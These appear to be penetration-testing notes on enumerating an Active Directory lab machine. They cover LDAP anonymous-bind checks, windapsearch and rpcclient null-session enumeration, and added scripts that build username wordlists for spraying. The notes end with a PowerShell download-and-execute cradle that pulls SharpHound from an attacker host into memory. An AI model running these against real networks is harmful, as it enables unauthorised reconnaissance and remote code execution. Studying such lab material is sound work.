Tools

LDAP

ldapsearch

To check whether anonymous binds are allowed, perform a simple bind with no credentials and try to read the base of the domain naming context. If the read returns the entry, anonymous enumeration is on; if the DC answers with "Operations error" (AD adds a 000004DC "a successful bind must be completed" message), the bind was accepted but unauthenticated reads are refused:

ldapsearch -H ldap://10.10.10.161 -x -b 'dc=htb,dc=local' -s base

# -x: simple (non-SASL) bind; with no -D/-w it is an anonymous bind
# -b: base DN to search, -s base: return only that entry

windapsearch

If anonymous LDAP reads are allowed (or you have a set of domain credentials), enumerate users, computers, and groups with windapsearch:

windapsearch -d htb.local --dc 10.10.10.161 -m users --attrs samaccountname | grep -i samaccountname
windapsearch -d htb.local --dc 10.10.10.161 -m computers
windapsearch -d htb.local --dc 10.10.10.161 -m groups | grep cn | awk -F\: '{print $2}'
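The two steps above (anonymous-bind check, then user enumeration) scripted end to end. This is an added example, not part of the original notes: it reads the RootDSE to discover the base DN instead of guessing it, tests anonymous reads against that DN, and turns LDIF-style output from ldapsearch or windapsearch into a username wordlist. The DC address 10.10.10.161 and the htb.local domain are taken from the notes; the SAMPLE_* text is constructed to resemble real output and is what the offline walk-through parses.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes). Assumes DC 10.10.10.161 and
# the htb.local domain; SAMPLE_* below is constructed, not captured output.

DC="${DC:-10.10.10.161}"

# The RootDSE (empty base, scope base) is readable without credentials on
# AD even when anonymous enumeration is disabled, so its success says
# nothing about what an anonymous bind can see. -x selects a simple bind;
# with no -D/-w that bind is anonymous.
rootdse() {
    ldapsearch -H "ldap://$DC" -x -LLL -s base -b '' \
        defaultNamingContext namingContexts 2>&1
}

# The real test: read the naming context itself. ldapsearch exits with the
# LDAP result code, so 0 means anonymous reads work; 1 (Operations error,
# 000004DC on AD) means the bind was accepted but reads are refused.
anon_read_allowed() {   # $1 = base DN
    ldapsearch -H "ldap://$DC" -x -LLL -s base -b "$1" 1.1 >/dev/null 2>&1
}

# Print the value(s) of one attribute from LDIF on stdin. Attribute names
# match case-insensitively; base64 ("attr:: ...") values are skipped.
ldif_attr() {
    awk -v want="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        index($0, ":") > 1 {
            attr = tolower(substr($0, 1, index($0, ":") - 1))
            val  = substr($0, index($0, ":") + 1)
            if (attr != want || substr(val, 1, 1) == ":") next
            sub(/^ +/, "", val)
            print val
        }'
}

base_dn_from_rootdse() { ldif_attr defaultNamingContext; }

# Lower-cased, de-duplicated sAMAccountNames: the wordlist for password
# spraying or AS-REP roasting checks.
usernames_from_ldif() { ldif_attr sAMAccountName | tr 'A-Z' 'a-z' | sort -u; }

# Constructed samples of a RootDSE query and of windapsearch -m users output
SAMPLE_ROOTDSE='dn:
defaultNamingContext: DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
'
SAMPLE_USERS='dn: CN=Administrator,CN=Users,DC=htb,DC=local
sAMAccountName: Administrator

dn: CN=John Doe,CN=Users,DC=htb,DC=local
sAMAccountName: jdoe
'

# Offline walk-through. Against a live DC replace the printf feeds with:
#   base_dn=$(rootdse | base_dn_from_rootdse); anon_read_allowed "$base_dn"
#   windapsearch -d htb.local --dc "$DC" -m users --attrs samaccountname | usernames_from_ldif
base_dn=$(printf '%s' "$SAMPLE_ROOTDSE" | base_dn_from_rootdse)
printf 'base DN: %s\n' "$base_dn"
printf '%s' "$SAMPLE_USERS" | usernames_from_ldif
```

The base DN discovered from defaultNamingContext is what goes into -b; only a successful read of that DN (not of the RootDSE) proves anonymous enumeration is possible.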

RPC

If the DC accepts a null session over SMB/MSRPC (empty username, no password), rpcclient can enumerate users and groups; machine accounts show up in the user list with a trailing $.

# Connect to RPC anonymously
rpcclient -U "" -N 10.10.10.161

# Enumerate Users
rpcclient $> enumdomusers

# Enumerate Groups (example output: name and RID in hex)
rpcclient $> enumdomgroups
 group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
 group:[Domain Admins] rid:[0x200]

# Query Group
rpcclient $> querygroup 0x200

# Query Group members (prints member RIDs; 0x1f4 = 500 = Administrator)
rpcclient $> querygroupmem 0x200
 rid:[0x1f4] attr:[0x7]

# Query User, using a RID taken from the member list above
rpcclient $> queryuser 0x1f4
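The same null-session workflow scripted in one pass, as an added example that is not part of the original notes. It uses rpcclient's -c option to run commands non-interactively, parses the user:[...] rid:[...] and group:[...] rid:[...] lines, resolves the member RIDs that querygroupmem prints back to account names, and converts hex RIDs to the decimal form seen in SIDs and BloodHound. The DC address comes from the notes; the SAMPLE_* output is constructed (the RIDs 0x1f4, 0x1f5, 0x1f6 and 0x200 are the well-known Administrator, Guest, krbtgt and Domain Admins values, jdoe is made up).

```shell
#!/usr/bin/env bash
# Added example (not from the original notes). Assumes DC 10.10.10.161;
# SAMPLE_* below is constructed, not captured from a real host.

DC="${DC:-10.10.10.161}"

# rpcclient -c runs one command over the null session and exits.
rpc() { rpcclient -U "" -N "$DC" -c "$*"; }

# "user:[Administrator] rid:[0x1f4]" or "group:[Domain Admins] rid:[0x200]"
# on stdin -> "name<TAB>hex-rid<TAB>decimal-rid". rpcclient wants the hex
# form; SIDs, event logs and BloodHound show the decimal one.
parse_rids() {
    awk '
        match($0, /(user|group):\[[^]]*\]/) {
            name = substr($0, RSTART, RLENGTH)
            sub(/^[a-z]+:\[/, "", name)
            sub(/\]$/, "", name)
            if (match($0, /rid:\[0x[0-9A-Fa-f]+\]/)) {
                hex = substr($0, RSTART + 5, RLENGTH - 6)
                printf "%s\t%s\n", name, hex
            }
        }' |
    while IFS="$(printf '\t')" read -r name hex; do
        printf '%s\t%s\t%d\n' "$name" "$hex" "$(( $hex ))"
    done
}

# Hex RID of one account or group name, looked up in a parse_rids table.
rid_of() {   # $1 = name, table on stdin
    awk -F'\t' -v want="$1" 'tolower($1) == tolower(want) { print $2; exit }'
}

# Map "rid:[0x1f4] attr:[0x7]" lines (querygroupmem) to names using the
# parse_rids table in file $1. RIDs with no match are printed raw so nested
# groups or accounts missing from enumdomusers are not silently dropped.
resolve_members() {   # $1 = table file, member lines on stdin
    awk -F'\t' 'NR == FNR { if ($2 != "") name[tolower($2)] = $1; next }
        match($0, /rid:\[0x[0-9A-Fa-f]+\]/) {
            rid = tolower(substr($0, RSTART + 5, RLENGTH - 6))
            print (rid in name) ? name[rid] : rid
        }' "$1" -
}

# Constructed samples of enumdomusers, enumdomgroups and querygroupmem output
SAMPLE_USERS='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[jdoe] rid:[0x451]
'
SAMPLE_GROUPS='group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
'
SAMPLE_DA_MEMBERS=' rid:[0x1f4] attr:[0x7]
 rid:[0x451] attr:[0x7]
'

# Offline walk-through: who is in Domain Admins. For a live target replace
# the printf feeds with  rpc enumdomusers,  rpc enumdomgroups  and
# rpc querygroupmem "$da_rid".
demo_domain_admins() {
    table=$(mktemp)
    printf '%s' "$SAMPLE_USERS" | parse_rids > "$table"
    da_rid=$(printf '%s' "$SAMPLE_GROUPS" | parse_rids | rid_of "Domain Admins")
    printf 'Domain Admins rid %s\n' "$da_rid"
    printf '%s' "$SAMPLE_DA_MEMBERS" | resolve_members "$table"
    rm -f "$table"
}
demo_domain_admins
```

Resolving member RIDs against the full user table is what turns the bare rid:[0x1f4] line into a name without a queryuser call per member; anything left unresolved is a candidate for queryuser or querygroup by hand.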

BloodHound

Host SharpHound.ps1 on the attacker machine (10.10.14.9 here) and load it into memory on the compromised host, then run the Invoke-BloodHound collector it defines; the zip it writes is what you import into the BloodHound GUI. Loading it this way never touches disk, but the download is plain HTTP and this download cradle is a common AV/EDR signature.

iex(new-object net.webclient).downloadstring("http://10.10.14.9/SharpHound.ps1")
